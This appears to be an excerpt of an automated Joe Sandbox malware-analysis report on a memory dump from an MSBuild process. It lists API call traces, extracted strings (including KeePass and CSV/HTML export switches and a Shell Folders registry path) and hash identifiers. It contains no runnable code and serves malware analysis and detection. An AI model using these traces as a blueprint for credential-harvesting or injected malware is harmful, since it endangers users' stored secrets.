• memset.MSVCRT ref: 0040870E
• strcmp.MSVCRT ref: 0040876B
• ??3@YAXPAX@Z.MSVCRT(?,?,?,?,?,?,?,?,?,?,?,?,?,?,0000001E), ref: 0040879D
• CloseHandle.KERNEL32(?,?,004089ED,?,?,?,0000001E,?,?,00000104,?,?,00000104,?,?,00000104), ref: 004087A6
Strings
Memory Dump Source
• Source File: 0000000B.00000002.2758427570.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_11_2_400000_MSBuild.jbxd
Similarity
• API ID: memset$File$_mbscpystrcmp$??2@??3@CloseCreateHandleReadSize
• String ID: ---
• API String ID: 3437578500-2854292027
APIs
Strings
Memory Dump Source
• Source File: 0000000B.00000002.2758427570.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_11_2_400000_MSBuild.jbxd
Similarity
• API ID: _wcsicmp
• String ID: /scomma$/shtml$/skeepass$/stab$/stabular$/sverhtml$/sxml
• API String ID: 2081463915-1959339147
APIs
• GetDC.USER32(00000000), ref: 004121FF
• GetDeviceCaps.GDI32(00000000,0000005A), ref: 0041220A
• ReleaseDC.USER32(00000000,00000000), ref: 0041221F
• SetBkMode.GDI32(?,00000001), ref: 00412232
• SetTextColor.GDI32(?,00FF0000), ref: 00412240
• SelectObject.GDI32(?,?), ref: 00412251
• DrawTextExW.USER32(?,?,000000FF,?,00000024,?), ref: 00412285
• SelectObject.GDI32(00000014,00000005), ref: 00412291
  • Part of subcall function 00411FC6: GetCursorPos.USER32(?), ref: 00411FD0
  • Part of subcall function 00411FC6: GetSubMenu.USER32(?,00000000), ref: 00411FDE
  • Part of subcall function 00411FC6: TrackPopupMenu.USER32(00000000,00000002,?,?,00000000,?,00000000), ref: 0041200F
• GetModuleHandleW.KERNEL32(00000000), ref: 004122AC
• LoadCursorW.USER32(00000000,00000067), ref: 004122B5
• SetCursor.USER32(00000000), ref: 004122BC
• PostMessageW.USER32(?,00000428,00000000,00000000), ref: 00412304
• memcpy.MSVCRT(?,?,00002008), ref: 0041234D
Memory Dump Source
• Source File: 0000000B.00000002.2758427570.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_11_2_400000_MSBuild.jbxd
Similarity
• API ID: Cursor$MenuObjectSelectText$CapsColorDeviceDrawHandleLoadMessageModeModulePopupPostReleaseTrackmemcpy
• String ID:
• API String ID: 1700100422-0
APIs
• GetClientRect.USER32(?,?), ref: 004111E0
• GetWindowRect.USER32(?,?), ref: 004111F6
• GetWindowRect.USER32(?,?), ref: 0041120C
• GetDlgItem.USER32(00000000,0000040D), ref: 00411246
• GetWindowRect.USER32(00000000), ref: 0041124D
• MapWindowPoints.USER32(00000000,00000000,?,00000002), ref: 0041125D
• BeginDeferWindowPos.USER32(00000004), ref: 00411281
• DeferWindowPos.USER32(?,?,00000000,00000000,00000000,?,?,00000004), ref: 004112A4
• DeferWindowPos.USER32(?,?,00000000,00000000,?,?,?,00000006), ref: 004112C3
• DeferWindowPos.USER32(?,?,00000000,00000000,000000DC,?,?,00000004), ref: 004112EE
• DeferWindowPos.USER32(?,00000000,00000000,00000000,?,?,000000DC,00000004), ref: 00411306
• EndDeferWindowPos.USER32(?), ref: 0041130B
Memory Dump Source
• Source File: 0000000B.00000002.2758427570.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_11_2_400000_MSBuild.jbxd
Similarity
• API ID: Window$Defer$Rect$BeginClientItemPoints
• String ID:
• API String ID: 552707033-0
APIs
• CreateFileW.KERNEL32(?,80000000,00000003,00000000,00000003,00000000,00000000,?,?,?,0040C255,?,?,*.*,0040C2BF,00000000), ref: 0040C0A4
  • Part of subcall function 0040A32D: SetFilePointer.KERNEL32(0040C2BF,?,00000000,00000000,?,0040C0C5,00000000,00000000,?,00000020,?,0040C255,?,?,*.*,0040C2BF), ref: 0040A33A
• GetFileSize.KERNEL32(00000000,00000000), ref: 0040C0D4
  • Part of subcall function 0040BFF3: _memicmp.MSVCRT ref: 0040C00D
  • Part of subcall function 0040BFF3: memcpy.MSVCRT(?,?,00000004,00000000,?,?,?,?,?,?,?,?,*.*,0040C2BF,00000000), ref: 0040C024
• memcpy.MSVCRT(00000000,?,00000004,00000000,?,?,?,?), ref: 0040C11B
• strchr.MSVCRT ref: 0040C140
• strchr.MSVCRT ref: 0040C151
• _strlwr.MSVCRT ref: 0040C15F
• memset.MSVCRT ref: 0040C17A
• CloseHandle.KERNEL32(00000000), ref: 0040C1C7
Strings
Memory Dump Source
• Source File: 0000000B.00000002.2758427570.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_11_2_400000_MSBuild.jbxd
Similarity
• API ID: File$memcpystrchr$CloseCreateHandlePointerSize_memicmp_strlwrmemset
• String ID: 4$h
• API String ID: 4066021378-1856150674
                                                                                                                                            APIs
                                                                                                                                            Strings
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 0000000B.00000002.2758427570.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_11_2_400000_MSBuild.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID: memset$_snwprintf
                                                                                                                                            • String ID: %%0.%df
                                                                                                                                            APIs
                                                                                                                                            • SetTimer.USER32(?,00000041,00000064,00000000), ref: 004060C7
                                                                                                                                            • KillTimer.USER32(?,00000041), ref: 004060D7
                                                                                                                                            • KillTimer.USER32(?,00000041), ref: 004060E8
                                                                                                                                            • GetTickCount.KERNEL32 ref: 0040610B
                                                                                                                                            • GetParent.USER32(?), ref: 00406136
                                                                                                                                            • SendMessageW.USER32(00000000), ref: 0040613D
                                                                                                                                            • BeginDeferWindowPos.USER32(00000004), ref: 0040614B
                                                                                                                                            • EndDeferWindowPos.USER32(00000000), ref: 0040619B
                                                                                                                                            • InvalidateRect.USER32(?,?,00000001), ref: 004061A7
                                                                                                                                            Strings
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 0000000B.00000002.2758427570.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_11_2_400000_MSBuild.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID: Timer$DeferKillWindow$BeginCountInvalidateMessageParentRectSendTick
                                                                                                                                            • String ID: A
                                                                                                                                            APIs
                                                                                                                                            Strings
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 0000000B.00000002.2758427570.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_11_2_400000_MSBuild.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID: Menu$Itemmemset$CountInfoModifywcscatwcschr
                                                                                                                                            • String ID: 0$6
                                                                                                                                            APIs
                                                                                                                                            • memset.MSVCRT ref: 004082EF
                                                                                                                                              • Part of subcall function 0040A6E6: WideCharToMultiByte.KERNEL32(0000FDE9,00000000,000003FF,000000FF,00000000,000003FF,00000000,00000000,0040B866,00445FAE,?,?,?,?,?,?), ref: 0040A6FF
                                                                                                                                            • memset.MSVCRT ref: 00408362
                                                                                                                                            • memset.MSVCRT ref: 00408377
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 0000000B.00000002.2758427570.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_11_2_400000_MSBuild.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID: memset$ByteCharMultiWide
                                                                                                                                            • String ID:
                                                                                                                                            APIs
                                                                                                                                            • memset.MSVCRT ref: 0040A47B
                                                                                                                                            • _snwprintf.MSVCRT ref: 0040A4AE
                                                                                                                                            • wcslen.MSVCRT ref: 0040A4BA
                                                                                                                                            • memcpy.MSVCRT(?,?,?,?,?,00000400,%s (%s),?,?), ref: 0040A4D2
                                                                                                                                            • wcslen.MSVCRT ref: 0040A4E0
                                                                                                                                            • memcpy.MSVCRT(?,?,?,?,?,?,?,?,?,00000400,%s (%s),?,?), ref: 0040A4F3
                                                                                                                                            Strings
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 0000000B.00000002.2758427570.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_11_2_400000_MSBuild.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID: memcpywcslen$_snwprintfmemset
                                                                                                                                            • String ID: %s (%s)$YV@
                                                                                                                                            APIs
                                                                                                                                            • LoadLibraryW.KERNEL32(comctl32.dll), ref: 004044C3
                                                                                                                                            • GetProcAddress.KERNEL32(00000000,InitCommonControlsEx), ref: 004044D5
                                                                                                                                            • FreeLibrary.KERNEL32(00000000), ref: 004044E9
                                                                                                                                            • MessageBoxW.USER32(00000001,Error: Cannot load the common control classes.,Error,00000030), ref: 00404514
                                                                                                                                            Strings
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 0000000B.00000002.2758427570.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_11_2_400000_MSBuild.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID: Library$AddressFreeLoadMessageProc
                                                                                                                                            • String ID: Error$Error: Cannot load the common control classes.$InitCommonControlsEx$comctl32.dll
                                                                                                                                            APIs
                                                                                                                                            • LoadLibraryExW.KERNEL32(netmsg.dll,00000000,00000002,?,?,?,?,00409764,?), ref: 0040A686
                                                                                                                                            • FormatMessageW.KERNEL32(00001100,00000000,?,00000400,?,00000000,00000000,?,?,?,?,00409764,?), ref: 0040A6A4
                                                                                                                                            • wcslen.MSVCRT ref: 0040A6B1
                                                                                                                                            • wcscpy.MSVCRT ref: 0040A6C1
                                                                                                                                            • LocalFree.KERNEL32(?,?,00000400,?,00000000,00000000,?,?,?,?,00409764,?), ref: 0040A6CB
                                                                                                                                            • wcscpy.MSVCRT ref: 0040A6DB
                                                                                                                                            Strings
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 0000000B.00000002.2758427570.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_11_2_400000_MSBuild.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID: wcscpy$FormatFreeLibraryLoadLocalMessagewcslen
                                                                                                                                            • String ID: Unknown Error$netmsg.dll
                                                                                                                                            APIs
                                                                                                                                            Strings
                                                                                                                                            • database %s is already in use, xrefs: 0042F6C5
                                                                                                                                            • cannot ATTACH database within transaction, xrefs: 0042F663
                                                                                                                                            • attached databases must use the same text encoding as main database, xrefs: 0042F76F
                                                                                                                                            • database is already attached, xrefs: 0042F721
                                                                                                                                            • out of memory, xrefs: 0042F865
                                                                                                                                            • unable to open database: %s, xrefs: 0042F84E
                                                                                                                                            • too many attached databases - max %d, xrefs: 0042F64D
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 0000000B.00000002.2758427570.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_11_2_400000_MSBuild.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID: memcpymemset
                                                                                                                                            • String ID: attached databases must use the same text encoding as main database$cannot ATTACH database within transaction$database %s is already in use$database is already attached$out of memory$too many attached databases - max %d$unable to open database: %s
                                                                                                                                            APIs
                                                                                                                                            • DeleteFileW.KERNEL32(00000000,?,00000000,00000080,0045DBC0,00417C3A,00000000,?,00000000,00000000), ref: 00418548
                                                                                                                                            • GetFileAttributesW.KERNEL32(00000000), ref: 0041854F
                                                                                                                                            • GetLastError.KERNEL32 ref: 0041855C
                                                                                                                                            • Sleep.KERNEL32(00000064), ref: 00418571
                                                                                                                                            • DeleteFileA.KERNEL32(00000000,?,00000000,00000080,0045DBC0,00417C3A,00000000,?,00000000,00000000), ref: 0041857A
                                                                                                                                            • GetFileAttributesA.KERNEL32(00000000), ref: 00418581
                                                                                                                                            • GetLastError.KERNEL32 ref: 0041858E
                                                                                                                                            • Sleep.KERNEL32(00000064), ref: 004185A3
                                                                                                                                            • free.MSVCRT ref: 004185AC
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 0000000B.00000002.2758427570.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_11_2_400000_MSBuild.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID: File$AttributesDeleteErrorLastSleep$free
                                                                                                                                            • String ID:
                                                                                                                                            APIs
                                                                                                                                            • GetModuleHandleW.KERNEL32(00000000,?,?,00402E6F), ref: 0040D173
                                                                                                                                            • wcscpy.MSVCRT ref: 0040D1B5
                                                                                                                                              • Part of subcall function 0040D626: memset.MSVCRT ref: 0040D639
                                                                                                                                              • Part of subcall function 0040D626: _itow.MSVCRT ref: 0040D647
                                                                                                                                            • wcslen.MSVCRT ref: 0040D1D3
                                                                                                                                            • GetModuleHandleW.KERNEL32(00000000), ref: 0040D1E1
                                                                                                                                            • LoadStringW.USER32(00000000,?,?), ref: 0040D20C
                                                                                                                                            • memcpy.MSVCRT(00000000,00000002,?,?,00402E6F), ref: 0040D24C
                                                                                                                                              • Part of subcall function 0040D092: ??2@YAPAXI@Z.MSVCRT(00000000,0040D142,00402E6F), ref: 0040D0CC
                                                                                                                                              • Part of subcall function 0040D092: ??2@YAPAXI@Z.MSVCRT(00000000,00000000,0040D142,00402E6F), ref: 0040D0EA
                                                                                                                                              • Part of subcall function 0040D092: ??2@YAPAXI@Z.MSVCRT(00000000,00000000,00000000,0040D142,00402E6F), ref: 0040D108
                                                                                                                                              • Part of subcall function 0040D092: ??2@YAPAXI@Z.MSVCRT(00000000,00000000,00000000,00000000,0040D142,00402E6F), ref: 0040D126
                                                                                                                                            Strings
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 0000000B.00000002.2758427570.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_11_2_400000_MSBuild.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID: ??2@$HandleModule$LoadString_itowmemcpymemsetwcscpywcslen
                                                                                                                                            • String ID: strings
                                                                                                                                            • API String ID: 3166385802-3030018805
                                                                                                                                            • Opcode ID: 1ff794482afb279d074c0027ae841dfa169eb318e5c6685fac8801d3cb652815
                                                                                                                                            • Instruction ID: f4589d763452722e7ce024d248fd6f149fceb83749f413ad0df853fa0cd60d20
                                                                                                                                            • Opcode Fuzzy Hash: 1ff794482afb279d074c0027ae841dfa169eb318e5c6685fac8801d3cb652815
                                                                                                                                            • Instruction Fuzzy Hash: 78418D75D003109BD7369FA8ED809263365FF48306700047EE942972A7DEB9E886CB5D
                                                                                                                                            APIs
                                                                                                                                              • Part of subcall function 004055A4: GetLastError.KERNEL32(?,00000000,00405522,?,?,?,00000000,00000000,?,00408E1C,?,?,00000060,00000000), ref: 004055B9
                                                                                                                                            • memset.MSVCRT ref: 00405455
                                                                                                                                            • memset.MSVCRT ref: 0040546C
                                                                                                                                            • memset.MSVCRT ref: 00405483
                                                                                                                                            • memcpy.MSVCRT(?,00000000,?,?,?,?,?,?,?,?,?,?), ref: 00405498
                                                                                                                                            • memcpy.MSVCRT(?,00000000,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 004054AD
                                                                                                                                            Strings
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 0000000B.00000002.2758427570.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_11_2_400000_MSBuild.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID: memset$memcpy$ErrorLast
                                                                                                                                            • String ID: 6$\
                                                                                                                                            • API String ID: 404372293-1284684873
                                                                                                                                            • Opcode ID: c52bb6eee22109a6197316720abdd8282c22b56b49716a990b3966b2803c4fd3
                                                                                                                                            • Instruction ID: af38dfd20ac5a94c77b7ead9800c7a3089711b207e9f3183cf3669ed78e53beb
                                                                                                                                            • Opcode Fuzzy Hash: c52bb6eee22109a6197316720abdd8282c22b56b49716a990b3966b2803c4fd3
                                                                                                                                            • Instruction Fuzzy Hash: 572141B280112CBBDF11AF99DC45EDF7BACDF15304F0080A6B509E2156E6398B988F65
                                                                                                                                            APIs
                                                                                                                                            • FileTimeToSystemTime.KERNEL32(?,?), ref: 0040A088
                                                                                                                                            • GetDateFormatW.KERNEL32(00000400,00000001,000007C1,00000000,?,00000080), ref: 0040A0B4
                                                                                                                                            • GetTimeFormatW.KERNEL32(00000400,00000000,000007C1,00000000,?,00000080), ref: 0040A0C9
                                                                                                                                            • wcscpy.MSVCRT ref: 0040A0D9
                                                                                                                                            • wcscat.MSVCRT ref: 0040A0E6
                                                                                                                                            • wcscat.MSVCRT ref: 0040A0F5
                                                                                                                                            • wcscpy.MSVCRT ref: 0040A107
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 0000000B.00000002.2758427570.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_11_2_400000_MSBuild.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID: Time$Formatwcscatwcscpy$DateFileSystem
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID: 1331804452-0
                                                                                                                                            • Opcode ID: f8aa036cb335485c7d93aed18039143b3373b2c7e44f2a4205c7e838cddf6ff7
                                                                                                                                            • Instruction ID: 70f18838178cd2dbc623065d80ced1a8b0c5b1489d8a310e1ceaee9f81d034e1
                                                                                                                                            • Opcode Fuzzy Hash: f8aa036cb335485c7d93aed18039143b3373b2c7e44f2a4205c7e838cddf6ff7
                                                                                                                                            • Instruction Fuzzy Hash: 321191B284011DBFEB10AF95DC45DEF777CEB01745F104076B904B6091E6399E858B7A
                                                                                                                                            APIs
                                                                                                                                              • Part of subcall function 0040440C: FreeLibrary.KERNEL32(?,0040436D,00000000,00000000,?,0040BDCC,?,00000000,?), ref: 00404414
                                                                                                                                              • Part of subcall function 0040A804: memset.MSVCRT ref: 0040A824
                                                                                                                                              • Part of subcall function 0040A804: GetSystemDirectoryW.KERNEL32(0045DE68,00000104), ref: 0040A841
                                                                                                                                              • Part of subcall function 0040A804: wcscpy.MSVCRT ref: 0040A854
                                                                                                                                              • Part of subcall function 0040A804: wcscat.MSVCRT ref: 0040A86A
                                                                                                                                              • Part of subcall function 0040A804: LoadLibraryW.KERNELBASE(00000000,?,?,?,?,?,?,?), ref: 0040A87B
                                                                                                                                              • Part of subcall function 0040A804: LoadLibraryW.KERNEL32(?,?,?,?,?,?,?,?), ref: 0040A884
                                                                                                                                            • GetProcAddress.KERNEL32(?,00000000), ref: 00404398
                                                                                                                                            • GetProcAddress.KERNEL32(?,00000000), ref: 004043AC
                                                                                                                                            • GetProcAddress.KERNEL32(?,00000000), ref: 004043BF
                                                                                                                                            • GetProcAddress.KERNEL32(?,00000000), ref: 004043D3
                                                                                                                                            • GetProcAddress.KERNEL32(?,00000000), ref: 004043E7
                                                                                                                                            Strings
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 0000000B.00000002.2758427570.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_11_2_400000_MSBuild.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID: AddressProc$Library$Load$DirectoryFreeSystemmemsetwcscatwcscpy
                                                                                                                                            • String ID: advapi32.dll
                                                                                                                                            • API String ID: 2012295524-4050573280
                                                                                                                                            • Opcode ID: 65f3d33700ac9d510cc5e5eb6f652d35bee5e6265e8d5a0c26d000a27f9b730c
                                                                                                                                            • Instruction ID: 6b6c0a27b71384d3bff991c3c7ca7c9b0301c8735f49a3ee57333cb8f9a5f734
                                                                                                                                            • Opcode Fuzzy Hash: 65f3d33700ac9d510cc5e5eb6f652d35bee5e6265e8d5a0c26d000a27f9b730c
                                                                                                                                            • Instruction Fuzzy Hash: 5F119470440700DDE6307F62EC0AF2777A4DF80714F104A3FE541565E1DBB8A8519AAD
                                                                                                                                            APIs
                                                                                                                                            Strings
                                                                                                                                            • <?xml version="1.0" encoding="ISO-8859-1" ?>, xrefs: 00410083
                                                                                                                                            • <?xml version="1.0" ?>, xrefs: 0041007C
                                                                                                                                            • <%s>, xrefs: 004100A6
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 0000000B.00000002.2758427570.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_11_2_400000_MSBuild.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID: memset$_snwprintf
                                                                                                                                            • String ID: <%s>$<?xml version="1.0" ?>$<?xml version="1.0" encoding="ISO-8859-1" ?>
                                                                                                                                            • API String ID: 3473751417-2880344631
                                                                                                                                            • Opcode ID: 8f05c840c11c4290d444f2162549af975e664009f5abef6099482a1c5cfc950c
                                                                                                                                            • Instruction ID: 2862698e7f89dc449948c814091faf4507903f68b21858a7dbdf66e33a92e1a6
                                                                                                                                            • Opcode Fuzzy Hash: 8f05c840c11c4290d444f2162549af975e664009f5abef6099482a1c5cfc950c
                                                                                                                                            • Instruction Fuzzy Hash: F501C8F2E402197BD720AA559C41FEAB6ACEF48345F0040B7B608B3151D6389F494B99
                                                                                                                                            APIs
                                                                                                                                            Strings
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 0000000B.00000002.2758427570.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_11_2_400000_MSBuild.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID: wcscat$_snwprintfmemset
                                                                                                                                            • String ID: %2.2X
                                                                                                                                            • API String ID: 2521778956-791839006
                                                                                                                                            • Opcode ID: fbe0b2ef567fee9eabd5ce406f53818797bf0b783fcface126c98386edfee971
                                                                                                                                            • Instruction ID: 672bbb69153a15f1984629f72f86def8939f314c78adde6f8276b735d3b02408
                                                                                                                                            • Opcode Fuzzy Hash: fbe0b2ef567fee9eabd5ce406f53818797bf0b783fcface126c98386edfee971
                                                                                                                                            • Instruction Fuzzy Hash: 2101D472A403297AF7206756AC46BBA33ACAB41714F11407BFC14AA1C2EA7C9A54469A
                                                                                                                                            APIs
                                                                                                                                            Strings
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 0000000B.00000002.2758427570.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_11_2_400000_MSBuild.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID: _snwprintfwcscpy
                                                                                                                                            • String ID: dialog_%d$general$menu_%d$strings
                                                                                                                                            • API String ID: 999028693-502967061
                                                                                                                                            • Opcode ID: 17378f80787d8f3ebe1be11f22ab444215ff95c87d82bd16ffe54226d060cac5
                                                                                                                                            • Instruction ID: 4b5f4d23dee208ad245a1fa3262b8d520e9fbefe09054bf07968a47f6ed58b46
                                                                                                                                            • Opcode Fuzzy Hash: 17378f80787d8f3ebe1be11f22ab444215ff95c87d82bd16ffe54226d060cac5
                                                                                                                                            • Instruction Fuzzy Hash: 1AE04FB5E8870035E92519A10C03B2A155086A6B5BF740C2BFD0AB11D2E47F955DA40F
                                                                                                                                            APIs
                                                                                                                                              • Part of subcall function 0040B1AB: free.MSVCRT ref: 0040B1AE
                                                                                                                                              • Part of subcall function 0040B1AB: free.MSVCRT ref: 0040B1B6
                                                                                                                                              • Part of subcall function 00414592: RegOpenKeyExW.KERNELBASE(80000002,80000002,00000000,00020019,80000002,00414CC1,80000002,Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders,00445DDE,?,?,00000000), ref: 004145A5
                                                                                                                                              • Part of subcall function 0040A9CE: free.MSVCRT ref: 0040A9DD
                                                                                                                                            • memset.MSVCRT ref: 0040C439
                                                                                                                                            • RegEnumValueW.ADVAPI32(?,00000000,?,000000FF,00000000,?,00000000,?,?,?,?,?,00000000,?), ref: 0040C467
                                                                                                                                            • _wcsupr.MSVCRT ref: 0040C481
                                                                                                                                              • Part of subcall function 0040A8D0: wcslen.MSVCRT ref: 0040A8E2
                                                                                                                                              • Part of subcall function 0040A8D0: free.MSVCRT ref: 0040A908
                                                                                                                                              • Part of subcall function 0040A8D0: free.MSVCRT ref: 0040A92B
                                                                                                                                              • Part of subcall function 0040A8D0: memcpy.MSVCRT(?,?,000000FF,00000000,?,?,00000000,?,0040320A,00000000,000000FF), ref: 0040A94F
                                                                                                                                            • memset.MSVCRT ref: 0040C4D0
                                                                                                                                            • RegEnumValueW.ADVAPI32(?,00000000,?,000000FF,00000000,?,00000000,?,?,?,000000FF,?,?,?,?,00000000), ref: 0040C4FB
                                                                                                                                            • RegCloseKey.ADVAPI32(?,?,?,?,?,00000000,?), ref: 0040C508
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 0000000B.00000002.2758427570.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_11_2_400000_MSBuild.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID: free$EnumValuememset$CloseOpen_wcsuprmemcpywcslen
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID: 4131475296-0
                                                                                                                                            • Opcode ID: eb77d7cad75ccead34f911285e165139a1ce78e2e313fb24f2a05cc2c8735199
                                                                                                                                            • Instruction ID: d2440758a7fd93b52fc88bd6111275bc9aa4df1ffeb01c53d5483546710cd2f3
                                                                                                                                            • Opcode Fuzzy Hash: eb77d7cad75ccead34f911285e165139a1ce78e2e313fb24f2a05cc2c8735199
                                                                                                                                            • Instruction Fuzzy Hash: A4411CB2900219BBDB00EF95DC85EEFB7BCAF48304F10417AB505F6191D7749A44CBA5
                                                                                                                                            APIs
                                                                                                                                            • memset.MSVCRT ref: 004116FF
                                                                                                                                              • Part of subcall function 0040D134: GetModuleHandleW.KERNEL32(00000000,?,?,00402E6F), ref: 0040D173
                                                                                                                                              • Part of subcall function 0040D134: LoadStringW.USER32(00000000,?,?), ref: 0040D20C
                                                                                                                                              • Part of subcall function 0040D134: memcpy.MSVCRT(00000000,00000002,?,?,00402E6F), ref: 0040D24C
                                                                                                                                              • Part of subcall function 0040D134: wcscpy.MSVCRT ref: 0040D1B5
                                                                                                                                              • Part of subcall function 0040D134: wcslen.MSVCRT ref: 0040D1D3
                                                                                                                                              • Part of subcall function 0040D134: GetModuleHandleW.KERNEL32(00000000), ref: 0040D1E1
                                                                                                                                              • Part of subcall function 0040A45A: memset.MSVCRT ref: 0040A47B
                                                                                                                                              • Part of subcall function 0040A45A: _snwprintf.MSVCRT ref: 0040A4AE
                                                                                                                                              • Part of subcall function 0040A45A: wcslen.MSVCRT ref: 0040A4BA
                                                                                                                                              • Part of subcall function 0040A45A: memcpy.MSVCRT(?,?,?,?,?,00000400,%s (%s),?,?), ref: 0040A4D2
                                                                                                                                              • Part of subcall function 0040A45A: wcslen.MSVCRT ref: 0040A4E0
                                                                                                                                              • Part of subcall function 0040A45A: memcpy.MSVCRT(?,?,?,?,?,?,?,?,?,00000400,%s (%s),?,?), ref: 0040A4F3
                                                                                                                                              • Part of subcall function 0040A279: wcscpy.MSVCRT ref: 0040A2DF
                                                                                                                                            Strings
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 0000000B.00000002.2758427570.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_11_2_400000_MSBuild.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID: memcpywcslen$HandleModulememsetwcscpy$LoadString_snwprintf
                                                                                                                                            • String ID: *.csv$*.htm;*.html$*.txt$*.xml$txt
                                                                                                                                            • API String ID: 2618321458-3614832568
                                                                                                                                            • Opcode ID: 892276959a0c47848777e093024f27755814d5c903fce7db561a0975b0ee82c0
                                                                                                                                            • Instruction ID: 2af34abd3473d77be096866f654b5876edf67c2d942e61680e34910f62553c8c
                                                                                                                                            • Opcode Fuzzy Hash: 892276959a0c47848777e093024f27755814d5c903fce7db561a0975b0ee82c0
